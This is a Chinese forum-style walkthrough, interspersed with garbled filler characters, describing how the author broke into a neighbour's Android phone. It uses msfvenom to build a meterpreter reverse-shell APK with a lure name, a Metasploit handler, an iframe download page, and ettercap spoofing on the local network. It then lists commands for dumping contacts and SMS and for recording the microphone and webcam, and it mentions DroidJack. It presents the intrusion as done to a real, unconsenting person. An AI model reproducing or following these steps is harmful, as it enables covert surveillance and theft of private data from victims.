|
' P+ Z1 H; f% B3 r! l
五、msf+ettercap入侵邻居安卓手机 5 s1 \ r0 H, V6 [6 |6 q
; T ]* a( B% M9 o8 A+ I* r7 B0 ~
: U% Y7 o# q! n4 @
首先启动msf
' Q7 H" ?4 |$ a: f 5 n) l( C0 I z9 O
3 h- P g9 ?( O6 y2 ?0 L 先用kali生成一个安卓木马,如下命令: . _/ o" U5 R- [' H- {: s
1 H: {8 p; g0 H3 E
- m7 o2 W% w, S" e4 d Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk $ O' Y; ?* ^7 U1 X- p5 p+ Z! y) u% w" }
* V# o( x/ n5 {/ I3 Z% ~( }
' }' o) Q E) b. B6 `5 ~! l 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , z. }, H. H e4 z4 L
6 q( X4 K+ M3 Z. i8 W
" ^, z/ Y: V. p W7 B! d6 | 然后进入msf / X9 y7 w0 o- ]# B, X5 E
' y- w/ s% A" [2 ?' d( J; W
- s% c, R) \9 C" i8 ^2 j8 ]
use exploit/multi/handler 5 H6 `- u& U2 i6 I7 k
$ q% ]# \ P6 ~ b9 ?9 E q9 M3 ?3 W
set payload android/meterpreter/reverse_tcp
0 g' B/ k- v/ J2 @
# j. R* T& ?0 q+ [2 F6 P, L7 m- y, J
set LHOST 192.168.0.109 //ip为kaili的ip ; `/ Y( D7 Q0 N* X
4 R+ N( d* _' Q& [- r7 Z
/ i: x0 z: P2 M! o% O# u0 @ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 1 a' I! A: t3 o, @9 E9 ?- G
& J# E" x0 M; ]" }* ~* P
. O, `" e4 t% O' t" g Exploit
5 Z1 a1 g8 w7 H8 G
1 ]7 c: @* h, d5 u% G2 {: P: Z h$ N- X$ M
. Q, y* x6 f( Q1 E : m Y# P/ P6 Z4 ]( @
" e. c- U7 o/ o% r1 C
下面我们开启ettercap -G
- u; C9 Q- o0 B ~
6 ]9 P: v+ i" B* z& }
- A3 X: ^0 x" z Y" @ 我物理IP为 L/ h4 C$ V/ r
: n* T! z" v% _. ^! s" v+ y+ i5 y8 ~9 f3 N# ]. x% [
' @1 k/ D+ k G6 B2 H1 P. B; B
8 d0 v2 k9 v! Y1 T$ d1 i
9 d/ A( P6 e: s! ^) B 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, + s2 }* Z9 e, G0 M4 z
1 a! P' `' J& T4 E& \& P$ E: M- ^: D7 ?! w
下面我们来设置一下 & H) j; D+ e9 L! K
$ p% G& B; p& l8 O# o
% @, T# h# q1 `( c
8 H2 Q7 V+ b+ t% _8 d0 E6 t . Q5 q7 ?! p. C2 [. i6 T
/ Z. P1 p% @9 |. L2 N. l* j4 C 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
% N7 {7 Y+ U) {: _
6 p: N0 y: C* Y: z; P/ u0 `% N
/ `- w1 P4 j0 K - [; n6 J+ B" a; G) l3 U
; d, ^/ a; y4 ?3 P3 u
3 M1 c3 _, `! O; x. ^ y8 w3 S5 ?
5 ? ?8 O0 d0 m6 p( I. Z
$ t% m5 u+ K# s( n7 H
# J. V8 H @# m2 e; \+ K" q7 m/ n6 u ! ?: U% f3 `& `
- {" A( L; D+ o2 g" N. _: q
# s# J1 k/ T9 m
- P+ Q2 i9 z+ S. j) O. {- f+ f* |9 d- i
r# t: Z+ {6 r9 J! P: r! x: f9 k+ j9 I& [ q
7 Y6 c7 \7 C7 i4 _& V
$ D( @; {- M1 x, \$ C9 F
2 t( u5 t& R2 a9 B( r
: m# \+ T+ j" h% \ U7 J, U X
- p. m( C: _ Z6 x6 K2 C/ U4 W
, f+ g1 V! R& C+ x
! }/ E& N0 |9 l1 E" v b : O! o9 ~( A4 ?9 n/ ^# K4 Q- [
- o0 \$ H9 x. u/ N
- q8 l+ ?+ N( E: _; |; F. L ) `7 ~' Z7 S* h
) A, k! B- j& A# W, c1 K/ x
- L. v I# [( }+ e
7 i/ q+ R0 z, X1 ^) l1 `7 z
4 h, h# l5 ^( u6 h6 ]" [! T! b * Q' J1 e( G7 t: V
8 f+ f) T, W1 Y3 [% x1 ^; G+ @4 c
8 n' a7 {+ R5 _4 [. }
$ e6 o$ E( s# a) p1 b H
% \: U& j p0 z4 B$ t u$ \
3 U! [! Z! _& l" b
( w* d" J; s# `/ j- Z% \
3 K* r& x9 ]# k8 N6 R( u3 n- ^8 T! U6 m1 d
6 { f- O1 R; N \& L
9 e7 s* d# X$ Z! D! e& K: f& Y! U/ ? S7 t/ z- J# b' _' i
下面我们开始攻击 ( k5 W/ E+ g. ?% O0 }' P+ D) T" n0 q
: _, ?- g9 Q7 }8 A8 r0 a6 p5 s* p5 E# Y
( w6 y! H+ k- C! \! Y
- \0 ] r3 c# j
* {, M+ n7 L w( a+ ^4 n3 x
0 ~/ E& Z: u0 [4 M) O
2 R* `" F; v( D# ^3 R4 N* b2 w0 j* B' u+ z0 @5 y' G
7 D+ F, t2 [! I5 E8 j# s& `# T
/ e' B+ F0 E2 `: Y; D1 i& z. y! j
3 @5 @+ b+ i7 a6 z7 V/ G
$ A# K+ F/ C3 J$ C* D. i# a
& q* X' N4 }8 v" }4 Z/ H" }6 n' Y- @0 v; h/ z: Q3 E6 v
* A; f/ {: m5 U" z# D
0 B( A3 v) c/ _; x0 N3 ^' c, v5 v
大概过了5分钟多,发现反弹成功了
6 p; k2 O, n& U1 J2 J# x/ A
( _( j1 j; G/ d+ {5 u3 w
1 a, ^6 l9 P+ {$ e ! @5 ~; D) N2 |" E$ y
/ i* K5 F# \) l" d* C, m5 }" g) a' H4 r( e# \0 z! \. y9 o% [
( K5 D' V9 i; o2 C+ L 5 i) L1 m( r5 f5 C
2 r6 M* G; y5 U( L8 p: D* ^ 4 o( q8 y3 d2 R( A3 Y" d2 Z
1 K; k% B6 Q8 ]. H9 n. K) F
6 Y2 ~% F3 H" ~( G & s1 i O& S" m
: a! Q6 q: d+ \6 b
" \1 o3 h. w, E6 v9 \, B
6 }2 d' e, ~/ b, ^- }
7 [) `0 T9 e- I
+ p7 t8 o" }$ M0 O% Z. a # l3 m$ N5 o$ {$ J. p. J
; y) B4 N# O# t* A5 |% K) Q/ k$ ^0 b$ j5 T% ~: F& i( H/ w
* y1 h# A5 y+ }7 H
9 s9 t9 a4 G F8 {9 K) T3 s- ~; u# C: N5 I( W0 Z
执行命令 3 p& Y( t% D; P1 m
1 q* K1 i7 p! w5 v$ k; h
1 T5 S1 c* }8 Y* e! N& h
3 Y! O! Y, d6 y7 n% S
! u) P K% B6 z" u" `( u9 `; K! Y8 E
, D& Q3 @' n$ h# z
dump_contacts --》这个是导出电话
" P0 h; [( j/ a2 U9 k 0 D( b( W% t: F, ?' X' v W. T
4 R# K' }- v0 k' m dump_sms --》这个是导出信息
1 L! z, {& ?8 H4 s( T, P. a; x2 N 7 _% H9 u; O+ S7 H' B+ [# R
6 u w" q O* ~4 Q# m5 C+ k
record_mic Record audio from the default microphone for X seconds
' S' ?0 C8 P8 y+ A" D8 B. P% Z
# P, J7 U& s1 I, ~2 G. J- z/ u
) J4 |; j* \5 _. ]* \9 f7 l webcam_chat Start a video chat 0 ]7 C7 |, k& ?/ V3 I" y5 L9 U4 o
! Y8 x) ^; w0 C% s5 a/ e; O3 [8 [5 g) m. [1 o
webcam_list List webcams
( f% F- V" {" |; f) D3 |! \& ` ) @. n, Z4 l$ d# ~" C
]2 Z/ Z' K5 T, m& t6 ~1 k
webcam_snap Take a snapshot from the specified webcam
w2 y2 y T2 ~- r8 c : u# x- h' D7 ]* h. L
' ]2 o4 w, A& W8 ~" |) e2 V webcam_stream   lay a video stream from the specified webcam % n) g8 y9 S( p8 A, C
5 z. v$ @/ W9 a: B$ r; x# b; e
% @6 J6 k# E! [" N$ G 8 U: l/ m% U5 B- D
5 p0 c. Y5 T8 W0 R: e
5 ~+ c/ _+ h% _/ u" y# }$ q
9 _; P0 v/ p" v) z! L
/ R2 i. q: F2 t7 m1 t
3 I* E8 g: I9 I B( v8 g% |
我们打开看一下电话薄, - C1 q/ S" v1 e) K8 [) B
1 P* k$ j0 @( Z6 g+ |
- u3 }+ D9 i! }# Z- Q" }
( o- \$ i8 u1 b& O2 x
+ g/ a% G* k! h9 u. c, m) j3 E/ S1 |) K
. h$ {" H T+ _. P
* i4 W4 a/ y+ c0 X Y1 _
3 H9 n7 F2 a y5 u6 f) D7 C1 H, f
. d- Y) w$ s+ _2 V1 t6 v: ]
% F/ {( M; y- ^( l4 H9 K
+ Y p+ I) v. N7 d" C+ |$ L% e O
) }9 r* F" J) }0 p' y5 d0 h & ~- ~' f" F/ s. [, f/ I
0 Q( p) u' r; x3 L
# m. @3 z7 g/ g, Z! @9 O7 I
& L: L0 o* M% \5 w' h i. V1 R: p0 J7 y
' G/ e" F( l0 h* ]9 v3 p0 o
+ X1 n4 \ e) K/ S* V _6 G1 j
1 z7 B* b6 Z3 e 我们同时欺骗成DroidJack木马,使用方法如图:
& d* W; L( @2 S5 O/ u8 e " }3 @$ b: D. A- b% S2 m
! m, c9 j k* Z; G; x
! f& C w7 q9 f) _2 W9 h
* r0 u4 p& {. V! I4 [8 l4 ^5 ?9 W5 G% x) E7 f
b5 R$ Y& f5 k0 Y # [2 C! o N+ [/ \+ M0 @- |$ S
0 U B" U8 t" d1 z* \9 S- g
# h7 p; I" D- J; `, z
. k3 P# z6 R( s9 Z( m
% g! v: U# v( j2 v( ~ S- M 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
; ~# d, n/ y7 ~5 W 8 t: F* [- @) H" @
- _% m% l1 R* ?7 A# z& ~; V. @+ ^
8 b- K/ J) Z, x! [. V& r3 w
% H; L$ s5 p3 d' c+ d' ?! x: j5 h- I$ |1 e$ ^& g: ~: I6 _
0 D4 f: C3 n& @1 R( X2 H# M0 y 5 v% k3 p$ A2 z; w; b1 j+ T
+ m0 {; ^* q& K( F/ \" \% Q
4 ~# Z0 o$ R& p0 i2 K( K
! K) Q1 {5 N: w X. f, [$ y! ]# w1 X0 G/ \0 U, j
 7 M9 K. w) ]4 `# j& x
) T) Z3 }6 c j1 u% J
' A3 P) h% _2 a* n* Y2 s; z" }3 d
8 x" g/ c8 T& ]+ \2 B |